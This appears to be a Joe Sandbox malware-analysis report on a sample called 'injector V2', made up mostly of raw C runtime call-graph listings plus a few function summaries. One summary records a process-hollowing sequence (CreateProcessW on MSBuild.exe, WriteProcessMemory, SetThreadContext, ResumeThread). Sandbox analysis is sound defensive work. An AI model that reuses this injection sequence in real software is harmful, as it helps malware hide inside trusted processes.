4dd131 ___scrt_uninitialize_crt WideCharToMultiByte 10930->10932 10931->10944 10949 4dcb19 10931->10949 10933 4dcbad 10932->10933 10935 4dcbca 10933->10935 10936 4dcbb4 GetLastError 10933->10936 10938 4dcbdb 10935->10938 10940 4dcb19 14 API calls 10935->10940 10937 4db77d __dosmaperr 14 API calls 10936->10937 10939 4dcbc0 10937->10939 10938->10944 10953 4dc594 10938->10953 10942 4db757 __dosmaperr 14 API calls 10939->10942 10940->10938 10942->10944 10944->10885 10945 4dcbf5 GetLastError 10946 4db77d __dosmaperr 14 API calls 10945->10946 10947 4dcc01 10946->10947 10948 4db757 __dosmaperr 14 API calls 10947->10948 10948->10944 10950 4dcb24 10949->10950 10951 4db757 __dosmaperr 14 API calls 10950->10951 10952 4dcb2d 10951->10952 10952->10944 10954 4dd131 ___scrt_uninitialize_crt WideCharToMultiByte 10953->10954 10955 4dc5b1 10954->10955 10955->10944 10955->10945 10959 4dcc2e 10956->10959 10960 4da8c8 __strnicoll 48 API calls 10959->10960 10961 4dcc29 10960->10961 10961->10892 10963 4dc736 10962->10963 10963->10963 10964 4db807 _unexpected 14 API calls 10963->10964 10982 4dc74f 10963->10982 10965 4dc764 10964->10965 10967 4df42e 48 API calls 10965->10967 10969 4dc777 10965->10969 10966 4df42e 48 API calls 10968 4dc790 10966->10968 10967->10969 10970 4dc7ce 10968->10970 10971 4dc797 10968->10971 10969->10966 10969->10970 10973 4d7d96 __strnicoll 11 API calls 10970->10973 11065 4dc6a3 10971->11065 10978 4dc7da 10973->10978 10975 4dc7b0 10980 4db0cb ___free_lconv_mon 14 API calls 10975->10980 10976 4dc822 10979 4dc84e 10976->10979 10981 4dc83b 10976->10981 10977 4db0cb ___free_lconv_mon 14 API calls 10977->10975 10978->10976 11076 4df530 10978->11076 10984 4dc274 48 API calls 10979->10984 10980->10982 10983 4dc72a 56 API calls 10981->10983 10982->10913 11013 4dc846 10983->11013 10986 4dc8a2 10984->10986 10987 4dc30c 17 API calls 10986->10987 10990 4dc8b0 FindFirstFileExW 10987->10990 10988 4d4241 TranslatorGuardHandler 5 API calls 10989 4dca5e 10988->10989 10989->10913 10991 4dc8d8 10990->10991 10998 4dc906 10990->10998 10992 4dc72a 56 API calls 10991->10992 10993 4dc8e6 10992->10993 10995 4db0cb ___free_lconv_mon 14 API calls 10993->10995 10993->11013 10994 4dc274 48 API calls 10994->10998 10995->11013 10997 4dc72a 56 API calls 10997->10998 10998->10994 10998->10997 10999 4dc9b7 FindNextFileW 10998->10999 11000 4dca1c 10998->11000 11001 4db0cb ___free_lconv_mon 14 API calls 10998->11001 11079 4dc5b8 10998->11079 10999->10998 11002 4dc9cd 10999->11002 11003 4dca30 FindClose 11000->11003 11005 4db0cb ___free_lconv_mon 14 API calls 11000->11005 11001->10998 11004 4dc9fd FindClose 11002->11004 11102 4def40 11002->11102 11006 4dca3f 11003->11006 11003->11013 11008 4dca0c 11004->11008 11004->11013 11010 4dca2f 11005->11010 11011 4db0cb ___free_lconv_mon 14 API calls 11006->11011 11009 4db0cb ___free_lconv_mon 14 API calls 11008->11009 11009->11013 11010->11003 11011->11013 11013->10988 11015 4dc822 11014->11015 11018 4dc805 11014->11018 11016 4dc84e 11015->11016 11017 4dc83b 11015->11017 11020 4dc274 48 API calls 11016->11020 11019 4dc72a 60 API calls 11017->11019 11018->11015 11021 4df530 48 API calls 11018->11021 11049 4dc846 11019->11049 11022 4dc8a2 11020->11022 11021->11018 11023 4dc30c 17 API calls 11022->11023 11026 4dc8b0 FindFirstFileExW 11023->11026 11024 4d4241 TranslatorGuardHandler 5 API calls 11025 4dca5e 11024->11025 11025->10913 11027 4dc8d8 11026->11027 11028 4dc906 11026->11028 11029 4dc72a 60 API calls 11027->11029 11031 4dc274 48 API calls 11028->11031 11033 4dc5b8 18 API calls 11028->11033 11034 4dc72a 60 API calls 11028->11034 11035 4dc9b7 FindNextFileW 11028->11035 11036 4dca1c 11028->11036 11037 4db0cb ___free_lconv_mon 14 API calls 11028->11037 11030 4dc8e6 11029->11030 11032 4db0cb ___free_lconv_mon 14 API calls 11030->11032 11030->11049 11031->11028 11032->11049 11033->11028 11034->11028 11035->11028 11038 4dc9cd 11035->11038 11039 4dca30 FindClose 11036->11039 11041 4db0cb ___free_lconv_mon 14 API calls 11036->11041 11037->11028 11040 4dc9fd FindClose 11038->11040 11043 4def40 48 API calls 11038->11043 11042 4dca3f 11039->11042 11039->11049 11044 4dca0c 11040->11044 11040->11049 11046 4dca2f 11041->11046 11047 4db0cb ___free_lconv_mon 14 API calls 11042->11047 11048 4dc9fa 11043->11048 11045 4db0cb ___free_lconv_mon 14 API calls 11044->11045 11045->11049 11046->11039 11047->11049 11048->11040 11049->11024 11051 4dc688 11050->11051 11052 4dc698 11051->11052 11053 4db0cb ___free_lconv_mon 14 API calls 11051->11053 11054 4db0cb ___free_lconv_mon 14 API calls 11052->11054 11053->11051 11055 4dc69f 11054->11055 11055->10921 11058 4df439 11056->11058 11057 4df453 11059 4df467 11057->11059 11060 4db757 __dosmaperr 14 API calls 11057->11060 11058->11057 11058->11059 11063 4df48c 11058->11063 11059->10922 11061 4df45d 11060->11061 11062 4d7d69 __strnicoll 48 API calls 11061->11062 11062->11059 11063->11059 11064 4db757 __dosmaperr 14 API calls 11063->11064 11064->11061 11066 4dc6b5 11065->11066 11075 4dc6b1 11065->11075 11067 4dc6ba 11066->11067 11068 4dc6e0 11066->11068 11069 4db807 _unexpected 14 API calls 11067->11069 11071 4dd0c4 51 API calls 11068->11071 11068->11075 11070 4dc6c3 11069->11070 11072 4db0cb ___free_lconv_mon 14 API calls 11070->11072 11073 4dc700 11071->11073 11072->11075 11074 4db0cb ___free_lconv_mon 14 API calls 11073->11074 11074->11075 11075->10975 11075->10977 11110 4df547 11076->11110 11078 4df542 11078->10978 11080 4dc5c6 11079->11080 11081 4dc5e2 11079->11081 11082 4dc2f2 14 API calls 11080->11082 11083 4dc5e9 11081->11083 11084 4dc605 11081->11084 11086 4dc5d0 11082->11086 11083->11086 11124 4dc329 11083->11124 11085 4dd131 ___scrt_uninitialize_crt WideCharToMultiByte 11084->11085 11088 4dc615 11085->11088 11086->10998 11089 4dc61c GetLastError 11088->11089 11090 4dc632 11088->11090 11091 4db77d __dosmaperr 14 API calls 11089->11091 11092 4dc643 11090->11092 11095 4dc329 15 API calls 11090->11095 11094 4dc628 11091->11094 11092->11086 11093 4dc594 WideCharToMultiByte 11092->11093 11096 4dc659 11093->11096 11097 4db757 __dosmaperr 14 API calls 11094->11097 11095->11092 11096->11086 11098 4dc65d GetLastError 11096->11098 11097->11086 11099 4db77d __dosmaperr 14 API calls 11098->11099 11100 4dc669 11099->11100 11101 4db757 __dosmaperr 14 API calls 11100->11101 11101->11086 11103 4def7a 11102->11103 11104 4db757 __dosmaperr 14 API calls 11103->11104 11109 4def8e 11103->11109 11105 4def83 11104->11105 11106 4d7d69 __strnicoll 48 API calls 11105->11106 11106->11109 11107 4d4241 TranslatorGuardHandler 5 API calls 11108 4dc9fa 11107->11108 11108->11004 11109->11107 11111 4df569 11110->11111 11112 4df555 11110->11112 11114 4df571 11111->11114 11115 4df583 11111->11115 11113 4db757 __dosmaperr 14 API calls 11112->11113 11116 4df55a 11113->11116 11117 4db757 __dosmaperr 14 API calls 11114->11117 11118 4da8c8 __strnicoll 48 API calls 11115->11118 11121 4df581 11115->11121 11119 4d7d69 __strnicoll 48 API calls 11116->11119 11120 4df576 11117->11120 11118->11121 11122 4df565 11119->11122 11123 4d7d69 __strnicoll 48 API calls 11120->11123 11121->11078 11122->11078 11123->11121 11125 4dc2f2 14 API calls 11124->11125 11126 4dc337 11125->11126 11127 4dc255 15 API calls 11126->11127 11128 4dc345 11127->11128 11128->11086 11130 4d76ce 11129->11130 11132 4d76ee 11129->11132 11131 4db757 __dosmaperr 14 API calls 11130->11131 11133 4d76e4 11131->11133 11132->10834 11134 4d7d69 __strnicoll 48 API calls 11133->11134 11134->11132 11144 4d7310 11147 4d7337 11144->11147 11148 4d7343 ___scrt_is_nonwritable_in_current_image 11147->11148 11155 4d8161 EnterCriticalSection 11148->11155 11150 4d734d 11151 4d737b 11150->11151 11153 4dc1fa __strnicoll 14 API calls 11150->11153 11156 4d7399 11151->11156 11153->11150 11155->11150 11159 4d8178 LeaveCriticalSection 11156->11159 11158 4d7335 11159->11158 8607 4d83ac 8610 4db0cb 8607->8610 8611 4db0d6 RtlFreeHeap 8610->8611 8612 4d83c4 8610->8612 8611->8612 8613 4db0eb GetLastError 8611->8613 8614 4db0f8 __dosmaperr 8613->8614 8616 4db757 8614->8616 8619 4da15b GetLastError 8616->8619 8618 4db75c 8618->8612 8620 4da177 8619->8620 8621 4da171 8619->8621 8625 4da17b SetLastError 8620->8625 8647 4d9bcf 8620->8647 8642 4d9b90 8621->8642 8625->8618 8629 4da1c1 8632 4d9bcf _unexpected 6 API calls 8629->8632 8630 4da1b0 8631 4d9bcf _unexpected 6 API calls 8630->8631 8639 4da1be 8631->8639 8633 4da1cd 8632->8633 8634 4da1e8 8633->8634 8635 4da1d1 8633->8635 8659 4da31c 8634->8659 8636 4d9bcf _unexpected 6 API calls 8635->8636 8636->8639 8637 4db0cb ___free_lconv_mon 12 API calls 8637->8625 8639->8637 8641 4db0cb ___free_lconv_mon 12 API calls 8641->8625 8664 4d9e9e 8642->8664 8645 4d9bb5 8645->8620 8646 4d9bc7 TlsGetValue 8648 4d9e9e _unexpected 5 API calls 8647->8648 8649 4d9beb 8648->8649 8650 4d9c09 TlsSetValue 8649->8650 8651 4d9bf4 8649->8651 8651->8625 8652 4db807 8651->8652 8657 4db814 _unexpected 8652->8657 8653 4db854 8656 4db757 __dosmaperr 13 API calls 8653->8656 8654 4db83f RtlAllocateHeap 8655 4da1a8 8654->8655 8654->8657 8655->8629 8655->8630 8656->8655 8657->8653 8657->8654 8679 4d7207 8657->8679 8693 4da482 8659->8693 8665 4d9bac 8664->8665 8666 4d9ece 8664->8666 8665->8645 8665->8646 8666->8665 8671 4d9dd3 8666->8671 8669 4d9ee8 GetProcAddress 8669->8665 8670 4d9ef8 _unexpected 8669->8670 8670->8665 8677 4d9de4 ___vcrt_FlsGetValue 8671->8677 8672 4d9e7a 8672->8665 8672->8669 8673 4d9e02 LoadLibraryExW 8674 4d9e1d GetLastError 8673->8674 8675 4d9e81 8673->8675 8674->8677 8675->8672 8676 4d9e93 FreeLibrary 8675->8676 8676->8672 8677->8672 8677->8673 8678 4d9e50 LoadLibraryExW 8677->8678 8678->8675 8678->8677 8682 4d7242 8679->8682 8683 4d724e ___scrt_is_nonwritable_in_current_image 8682->8683 8688 4d8161 EnterCriticalSection 8683->8688 8685 4d7259 __FrameHandler3::FrameUnwindToState 8689 4d7290 8685->8689 8688->8685 8692 4d8178 LeaveCriticalSection 8689->8692 8691 4d7212 8691->8657 8692->8691 8694 4da48e ___scrt_is_nonwritable_in_current_image 8693->8694 8707 4d8161 EnterCriticalSection 8694->8707 8696 4da498 8708 4da4c8 8696->8708 8699 4da4d4 8700 4da4e0 ___scrt_is_nonwritable_in_current_image 8699->8700 8712 4d8161 EnterCriticalSection 8700->8712 8702 4da4ea 8713 4da2d1 8702->8713 8704 4da502 8717 4da522 8704->8717 8707->8696 8711 4d8178 LeaveCriticalSection 8708->8711 8710 4da38a 8710->8699 8711->8710 8712->8702 8714 4da307 __strnicoll 8713->8714 8715 4da2e0 __strnicoll 8713->8715 8714->8704 8715->8714 8720 4dbfae 8715->8720 8834 4d8178 LeaveCriticalSection 8717->8834 8719 4da1f3 8719->8641 8721 4dc02e 8720->8721 8724 4dbfc4 8720->8724 8723 4db0cb ___free_lconv_mon 14 API calls 8721->8723 8745 4dc07c 8721->8745 8725 4dc050 8723->8725 8724->8721 8727 4db0cb ___free_lconv_mon 14 API calls 8724->8727 8729 4dbff7 8724->8729 8726 4db0cb ___free_lconv_mon 14 API calls 8725->8726 8728 4dc063 8726->8728 8732 4dbfec 8727->8732 8733 4db0cb ___free_lconv_mon 14 API calls 8728->8733 8734 4db0cb ___free_lconv_mon 14 API calls 8729->8734 8746 4dc019 8729->8746 8730 4db0cb ___free_lconv_mon 14 API calls 8735 4dc023 8730->8735 8731 4dc0ea 8736 4db0cb ___free_lconv_mon 14 API calls 8731->8736 8748 4db9d5 8732->8748 8738 4dc071 8733->8738 8739 4dc00e 8734->8739 8740 4db0cb ___free_lconv_mon 14 API calls 8735->8740 8741 4dc0f0 8736->8741 8742 4db0cb ___free_lconv_mon 14 API calls 8738->8742 8776 4dbad3 8739->8776 8740->8721 8741->8714 8742->8745 8744 4db0cb 14 API calls ___free_lconv_mon 8747 4dc08a 8744->8747 8788 4dc148 8745->8788 8746->8730 8747->8731 8747->8744 8749 4db9e6 8748->8749 8775 4dbacf 8748->8775 8750 4db9f7 8749->8750 8752 4db0cb ___free_lconv_mon 14 API calls 8749->8752 8751 4dba09 8750->8751 8753 4db0cb ___free_lconv_mon 14 API calls 8750->8753 8754 4dba1b 8751->8754 8755 4db0cb ___free_lconv_mon 14 API calls 8751->8755 8752->8750 8753->8751 8756 4dba2d 8754->8756 8757 4db0cb ___free_lconv_mon 14 API calls 8754->8757 8755->8754 8758 4dba3f 8756->8758 8760 4db0cb ___free_lconv_mon 14 API calls 8756->8760 8757->8756 8759 4dba51 8758->8759 8761 4db0cb ___free_lconv_mon 14 API calls 8758->8761 8762 4dba63 8759->8762 8763 4db0cb ___free_lconv_mon 14 API calls 8759->8763 8760->8758 8761->8759 8764 4dba75 8762->8764 8765 4db0cb ___free_lconv_mon 14 API calls 8762->8765 8763->8762 8766 4dba87 8764->8766 8767 4db0cb ___free_lconv_mon 14 API calls 8764->8767 8765->8764 8768 4db0cb ___free_lconv_mon 14 API calls 8766->8768 8769 4dba99 8766->8769 8767->8766 8768->8769 8770 4db0cb ___free_lconv_mon 14 API calls 8769->8770 8772 4dbaab 8769->8772 8770->8772 8771 4dbabd 8774 4db0cb ___free_lconv_mon 14 API calls 8771->8774 8771->8775 8772->8771 8773 4db0cb ___free_lconv_mon 14 API calls 8772->8773 8773->8771 8774->8775 8775->8729 8777 4dbb38 8776->8777 8778 4dbae0 8776->8778 8777->8746 8779 4dbaf0 8778->8779 8780 4db0cb ___free_lconv_mon 14 API calls 8778->8780 8781 4dbb02 8779->8781 8783 4db0cb ___free_lconv_mon 14 API calls 8779->8783 8780->8779 8782 4dbb14 8781->8782 8784 4db0cb ___free_lconv_mon 14 API calls 8781->8784 8785 4dbb26 8782->8785 8786 4db0cb ___free_lconv_mon 14 API calls 8782->8786 8783->8781 8784->8782 8785->8777 8787 4db0cb ___free_lconv_mon 14 API calls 8785->8787 8786->8785 8787->8777 8789 4dc155 8788->8789 8790 4dc174 8788->8790 8789->8790 8794 4dbb3c 8789->8794 8790->8747 8793 4db0cb ___free_lconv_mon 14 API calls 8793->8790 8795 4dbc1a 8794->8795 8796 4dbb4d 8794->8796 8795->8793 8830 4dbc20 8796->8830 8799 4dbc20 __strnicoll 14 API calls 8800 4dbb60 8799->8800 8801 4dbc20 __strnicoll 14 API calls 8800->8801 8802 4dbb6b 8801->8802 8803 4dbc20 __strnicoll 14 API calls 8802->8803 8804 4dbb76 8803->8804 8805 4dbc20 __strnicoll 14 API calls 8804->8805 8806 4dbb84 8805->8806 8807 4db0cb ___free_lconv_mon 14 API calls 8806->8807 8808 4dbb8f 8807->8808 8809 4db0cb ___free_lconv_mon 14 API calls 8808->8809 8810 4dbb9a 8809->8810 8811 4db0cb ___free_lconv_mon 14 API calls 8810->8811 8812 4dbba5 8811->8812 8813 4dbc20 __strnicoll 14 API calls 8812->8813 8814 4dbbb3 8813->8814 8815 4dbc20 __strnicoll 14 API calls 8814->8815 8816 4dbbc1 8815->8816 8817 4dbc20 __strnicoll 14 API calls 8816->8817 8818 4dbbd2 8817->8818 8819 4dbc20 __strnicoll 14 API calls 8818->8819 8820 4dbbe0 8819->8820 8821 4dbc20 __strnicoll 14 API calls 8820->8821 8822 4dbbee 8821->8822 8823 4db0cb ___free_lconv_mon 14 API calls 8822->8823 8824 4dbbf9 8823->8824 8825 4db0cb ___free_lconv_mon 14 API calls 8824->8825 8826 4dbc04 8825->8826 8827 4db0cb ___free_lconv_mon 14 API calls 8826->8827 8828 4dbc0f 8827->8828 8829 4db0cb ___free_lconv_mon 14 API calls 8828->8829 8829->8795 8831 4dbc32 8830->8831 8832 4dbb55 8831->8832 8833 4db0cb ___free_lconv_mon 14 API calls 8831->8833 8832->8799 8833->8831 8834->8719 11585 4daca2 11588 4d8178 LeaveCriticalSection 11585->11588 11587 4daca9 11588->11587 11625 4da2b0 11626 4da2bb 11625->11626 11630 4da2cb 11625->11630 11631 4da3b5 11626->11631 11629 4db0cb ___free_lconv_mon 14 API calls 11629->11630 11632 4da3ca 11631->11632 11633 4da3d0 11631->11633 11634 4db0cb ___free_lconv_mon 14 API calls 11632->11634 11635 4db0cb ___free_lconv_mon 14 API calls 11633->11635 11634->11633 11636 4da3dc 11635->11636 11637 4db0cb ___free_lconv_mon 14 API calls 11636->11637 11638 4da3e7 11637->11638 11639 4db0cb ___free_lconv_mon 14 API calls 11638->11639 11640 4da3f2 11639->11640 11641 4db0cb ___free_lconv_mon 14 API calls 11640->11641 11642 4da3fd 11641->11642 11643 4db0cb ___free_lconv_mon 14 API calls 11642->11643 11644 4da408 11643->11644 11645 4db0cb ___free_lconv_mon 14 API calls 11644->11645 11646 4da413 11645->11646 11647 4db0cb ___free_lconv_mon 14 API calls 11646->11647 11648 4da41e 11647->11648 11649 4db0cb ___free_lconv_mon 14 API calls 11648->11649 11650 4da429 11649->11650 11651 4db0cb ___free_lconv_mon 14 API calls 11650->11651 11652 4da437 11651->11652 11657 4da52e 11652->11657 11658 4da53a ___scrt_is_nonwritable_in_current_image 11657->11658 11673 4d8161 EnterCriticalSection 11658->11673 11660 4da544 11663 4db0cb ___free_lconv_mon 14 API calls 11660->11663 11664 4da56e 11660->11664 11663->11664 11674 4da58d 11664->11674 11665 4da599 11666 4da5a5 ___scrt_is_nonwritable_in_current_image 11665->11666 11678 4d8161 EnterCriticalSection 11666->11678 11668 4da5af 11669 4da2d1 _unexpected 14 API calls 11668->11669 11670 4da5c2 11669->11670 11679 4da5e2 11670->11679 11673->11660 11677 4d8178 LeaveCriticalSection 11674->11677 11676 4da45d 11676->11665 11677->11676 11678->11668 11682 4d8178 LeaveCriticalSection 11679->11682 11681 4da2c3 11681->11629 11682->11681

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,004EB0FF,004EB0EF), ref: 004EB323
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 004EB336
                                                                                    • Wow64GetThreadContext.KERNEL32(0000011C,00000000), ref: 004EB354
                                                                                    • ReadProcessMemory.KERNELBASE(000000A0,?,004EB143,00000004,00000000), ref: 004EB378
                                                                                    • VirtualAllocEx.KERNELBASE(000000A0,?,?,00003000,00000040), ref: 004EB3A3
                                                                                    • TerminateProcess.KERNELBASE(000000A0,00000000), ref: 004EB3C2
                                                                                    • WriteProcessMemory.KERNELBASE(000000A0,00000000,?,?,00000000,?), ref: 004EB3FB
                                                                                    • WriteProcessMemory.KERNELBASE(000000A0,00400000,?,?,00000000,?,00000028), ref: 004EB446
                                                                                    • WriteProcessMemory.KERNELBASE(000000A0,?,?,00000004,00000000), ref: 004EB484
                                                                                    • Wow64SetThreadContext.KERNEL32(0000011C,02920000), ref: 004EB4C0
                                                                                    • ResumeThread.KERNELBASE(0000011C), ref: 004EB4CF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                    • API String ID: 2440066154-3857624555
                                                                                    • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                    • Instruction ID: 8e965c0d0fbd983e95a0c6786bd7d60b23694cf586befc0b94a0fb7eb28d7a24
                                                                                    • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                    • Instruction Fuzzy Hash: 99B1197260068AAFDB60CF69CC80BDA73A5FF88714F158165EA0CAB341C774FA51CB94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: eacb0baa0fdf5f4db7b2764c197758ff7dffe98b3254b1ea64d6df4af6b7dcf9
                                                                                    • Instruction ID: 731e80ddab730671c8ae62ebb3be650f870f128c935bf3be077edf86f53e2b40
                                                                                    • Opcode Fuzzy Hash: eacb0baa0fdf5f4db7b2764c197758ff7dffe98b3254b1ea64d6df4af6b7dcf9
                                                                                    • Instruction Fuzzy Hash: FE0119B49043088FC754DF69C885BD9F7F0EB18714F0084AEA88897341EB78AA84CF85

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 25 4d9dd3-4d9ddf 26 4d9e71-4d9e74 25->26 27 4d9e7a 26->27 28 4d9de4-4d9df5 26->28 29 4d9e7c-4d9e80 27->29 30 4d9df7-4d9dfa 28->30 31 4d9e02-4d9e1b LoadLibraryExW 28->31 32 4d9e9a-4d9e9c 30->32 33 4d9e00 30->33 34 4d9e1d-4d9e26 GetLastError 31->34 35 4d9e81-4d9e91 31->35 32->29 37 4d9e6e 33->37 38 4d9e5f-4d9e6c 34->38 39 4d9e28-4d9e3a call 4dbc93 34->39 35->32 36 4d9e93-4d9e94 FreeLibrary 35->36 36->32 37->26 38->37 39->38 42 4d9e3c-4d9e4e call 4dbc93 39->42 42->38 45 4d9e50-4d9e5d LoadLibraryExW 42->45 45->35 45->38
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,D6656D70,?,004D9EE2,?,?,00000000), ref: 004D9E94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 3664257935-537541572
                                                                                    • Opcode ID: 784992709298733552a353899b95bcfff69b19da19033d57fbe89209a363e8f7
                                                                                    • Instruction ID: 770c9fc93d4b33e05b572e2e27c8f03cf20dc6b0374f12672536b81e51122f32
                                                                                    • Opcode Fuzzy Hash: 784992709298733552a353899b95bcfff69b19da19033d57fbe89209a363e8f7
                                                                                    • Instruction Fuzzy Hash: 96212731A00251ABCB21DB21DC94B5B7358EF82B60F250127ED06EB3D2DB38ED02C6D8

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 46 4cbeb0-4cbf22 CreateFileA 47 4cbf29-4cbf37 46->47 48 4cbf3d-4cbf4a 47->48 49 4cbff2-4cc00c 47->49 52 4cbf50-4cbf5d 48->52 53 4cc021-4cc054 GetFileSize 48->53 51 4cc16a 49->51 51->47 55 4cc078-4cc0ce call 4d4233 ReadFile 52->55 56 4cbf63-4cbf70 52->56 53->51 55->51 60 4cbf76-4cbf83 56->60 61 4cc011-4cc01c 56->61 63 4cc12c-4cc146 CloseHandle 60->63 64 4cbf89-4cbf96 60->64 61->51 63->51 66 4cbf9c-4cbfa9 64->66 67 4cc0f6-4cc108 call 4d423c 64->67 70 4cbfaf-4cbfbc 66->70 71 4cc0d3-4cc0f1 66->71 67->51 74 4cc059-4cc073 CloseHandle 70->74 75 4cbfc2-4cbfcf 70->75 71->51 74->51 77 4cc14b-4cc169 call 4d4241 75->77 78 4cbfd5-4cbfe2 75->78 81 4cc10d-4cc127 CloseHandle 78->81 82 4cbfe8-4cbfed 78->82 81->51 82->51
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088848581.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4c0000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 3536fc21cf7a3ec60ef729b291672ba0e5707c527c16d558f72690ee54cd9564
                                                                                    • Instruction ID: 486876cd5dbb12a582dd7b38d0c0038bdb39ef043afc23a3380d6a9311272e3e
                                                                                    • Opcode Fuzzy Hash: 3536fc21cf7a3ec60ef729b291672ba0e5707c527c16d558f72690ee54cd9564
                                                                                    • Instruction Fuzzy Hash: 10714CB8904209CFCB44DFA9D594BAEBBF0EB48700F10855EE845AB350DB389D458F9A

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(?,?,Function_00016E00,00000000,?,?), ref: 004D6D2F
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,004D3BEA), ref: 004D6D3B
                                                                                    • __dosmaperr.LIBCMT ref: 004D6D42
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088703704.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088658811.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088772977.00000000004E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088796026.00000000004EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088821535.00000000004EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088834500.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
